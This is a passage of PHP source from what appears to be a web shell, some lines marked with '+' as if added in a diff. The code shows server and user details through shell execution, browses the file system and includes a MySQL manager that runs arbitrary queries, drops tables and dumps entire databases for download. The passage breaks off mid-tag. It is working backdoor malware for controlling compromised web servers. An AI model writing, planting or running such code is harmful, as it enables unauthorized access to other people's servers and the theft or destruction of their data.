scrollbar-3dlight-color: #00CC00; scrollbar-darkshadow-color: #009900; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #000000; COLOR: green; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #009900; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #f89521; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #f89521; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #f89521; TEXT-DECORATION: none;}A:hover { COLOR: #f89521; TEXT-DECORATION: bold;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #009900; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #009900; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #009900;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><center><img src="http://img244.imageshack.us/img244/6663/locus7sgm8.jpg"></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +$d = str_replace("\\\\","\\",$d); +$dispd = htmlspecialchars($d); +$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); +$i = 0; +foreach($pd as $b) +{ + $t = ""; + $j = 0; + foreach ($e as $r) + { + $t.= $r.DIRECTORY_SEPARATOR; + if ($j == $i) {break;} + $j++; + } + echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; + $i++; +} +echo "&nbsp;&nbsp;&nbsp;"; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "<font color=green>[ ok ]</font>"; + echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; +} +else +{ + $wd = FALSE; + $wdt = "<font color=red>[ Read-Only ]</font>"; + echo "<b>".view_perms_color($d)."</b>"; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; +} +echo "<br>"; +echo "<b>Your ip: <a href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>"; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "<font color=green>".$letter."</font>";} + $letters .= " ]</a> "; + } + } + if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +} +echo "</p></td></tr></table><br>"; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} +echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_smarterror(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} + } + else {$sql_sock = FALSE;} + echo "<b>SQL Manager:</b><br>"; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} + echo "</center>"; + } + echo "</td></tr><tr>"; + if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } + else + { + //Start left panel + if (!empty($sql_db)) + { + ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_tables($sql_db); + if (!$result) {echo mysql_smarterror();} + else + { + echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_dbs($sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + $c = 0; + $dbs = ""; + while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} + echo "<option value=\"\">Databases (".$c.")</option>"; + echo $dbs; + } + ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + //End left panel + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} + echo "</b></center>"; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtbl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; + echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; + $v = join (";",$dmptbls); + echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; + echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; + echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; + echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; + echo "</form>"; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; + } + } + else {echo "<b>Dump: nothing to do!</b>";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "<br><br><b>Inserting row into table:</b><br>"; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; + $i++; + } + echo "</table><br>"; + echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; + if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} + echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "<hr size=\"1\" noshade>"; + echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} + else {echo "&nbsp;";} + } + if ($i == 0) {echo "empty";} + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; + for ($i=0;$i<mysql_num_fields($result);$i++) + { + $v = mysql_field_name($result,$i); + if ($e[0] == "a") {$s = "d"; $m = "asc";} + else {$s = "a"; $m = "desc";} + echo "<td>"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} + else {echo "<b>".$v."</b><a 